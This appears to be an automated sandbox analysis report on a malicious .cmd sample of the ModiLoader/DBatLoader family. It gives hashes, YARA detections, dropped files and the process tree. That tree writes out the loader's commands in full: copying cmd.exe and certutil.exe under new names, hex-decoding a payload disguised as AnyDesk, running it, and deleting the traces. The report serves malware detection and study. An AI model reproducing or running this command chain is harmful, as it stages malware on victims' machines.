Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
Resource
win10v2004-20241007-en
General
-
Target
0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
-
Size
3.3MB
-
MD5
55275e90f2a4ca23422103276e8eae71
-
SHA1
1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
-
SHA256
0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
-
SHA512
4ca26d59cba2e38751f527b12d040f1e5e67742020e3e0f93551b60f8600451e438c547d3c954778fc019889f93fb39a89ef5b214c4433a6c3f220ddabe7c26d
-
SSDEEP
24576:IHZYL1t28pLiMl5F3p03CX4axBJGhRCB4L90l6f2tliYajE/BPbN650iKBzFufPS:I5YLHFi05X03krZUFCsILZ4AX
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral2/memory/1380-28-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-32-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-34-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-33-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-37-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-38-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-50-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-60-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-75-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-93-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-91-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-90-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-89-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-88-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-85-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-82-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-83-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-80-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-79-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-78-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-74-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-72-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-71-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-68-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-87-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-67-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-86-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-66-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-84-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-65-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-64-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-81-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-63-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-62-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-61-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-77-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-76-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-59-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-58-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-73-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-57-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-70-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-56-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-69-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-55-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-54-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-53-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-52-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-51-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-49-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-48-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-47-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-46-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-45-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-43-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-42-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-41-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-40-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-39-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-36-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 behavioral2/memory/1380-35-0x0000000002EE0000-0x0000000003EE0000-memory.dmp modiloader_stage2 -
Executes dropped EXE 8 IoCs
pid Process 372 alpha.exe 4396 alpha.exe 3656 kn.exe 2820 alpha.exe 4004 kn.exe 1380 AnyDesk.PIF 2340 alpha.exe 3084 alpha.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.PIF -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2656 wrote to memory of 4860 2656 cmd.exe 84 PID 2656 wrote to memory of 4860 2656 cmd.exe 84 PID 2656 wrote to memory of 372 2656 cmd.exe 85 PID 2656 wrote to memory of 372 2656 cmd.exe 85 PID 372 wrote to memory of 3840 372 alpha.exe 86 PID 372 wrote to memory of 3840 372 alpha.exe 86 PID 2656 wrote to memory of 4396 2656 cmd.exe 87 PID 2656 wrote to memory of 4396 2656 cmd.exe 87 PID 4396 wrote to memory of 3656 4396 alpha.exe 88 PID 4396 wrote to memory of 3656 4396 alpha.exe 88 PID 2656 wrote to memory of 2820 2656 cmd.exe 90 PID 2656 wrote to memory of 2820 2656 cmd.exe 90 PID 2820 wrote to memory of 4004 2820 alpha.exe 91 PID 2820 wrote to memory of 4004 2820 alpha.exe 91 PID 2656 wrote to memory of 1380 2656 cmd.exe 94 PID 2656 wrote to memory of 1380 2656 cmd.exe 94 PID 2656 wrote to memory of 1380 2656 cmd.exe 94 PID 2656 wrote to memory of 2340 2656 cmd.exe 95 PID 2656 wrote to memory of 2340 2656 cmd.exe 95 PID 2656 wrote to memory of 3084 2656 cmd.exe 96 PID 2656 wrote to memory of 3084 2656 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:4860
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:3840
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 93⤵
- Executes dropped EXE
PID:3656
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 123⤵
- Executes dropped EXE
PID:4004
-
-
-
C:\Users\Public\Libraries\AnyDesk.PIFC:\Users\Public\Libraries\AnyDesk.PIF2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2340
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S2⤵
- Executes dropped EXE
PID:3084
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5b25f8b243fa4e165791ef4db2ed58251
SHA1cf923845aac7ee38eaddea46069a98eb3e1f2ad1
SHA256564768d36462eb6b5ed7c299f612ecde7938a9f7b239bdc116f730e13fa4203e
SHA512c6fb85ecd6a48266807a89a64fd52962a1d3e4413fdeaf5a90f400cd6abf9ec7379e7c38eea013a8e54ba8b0f0ad86307feb40d08bb71b13a96012d15e38c28b
-
Filesize
1.2MB
MD5e02910d2d83f40faef8719a99ee0ef5b
SHA149f932b32703d21b2041f36829d87353e64ae685
SHA256326a9344d8d5ce3e59d1c8560043d4ebd87ba53b732b635fab2d8afa210c5c05
SHA512a55d2321fe633cae781b5868763c9f778b3413d24aa0c83a99bd4e12bd489ec2cbac3bca1fea04a8233a542fbf609b33db697e32180d3948deda723b096f60b2
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b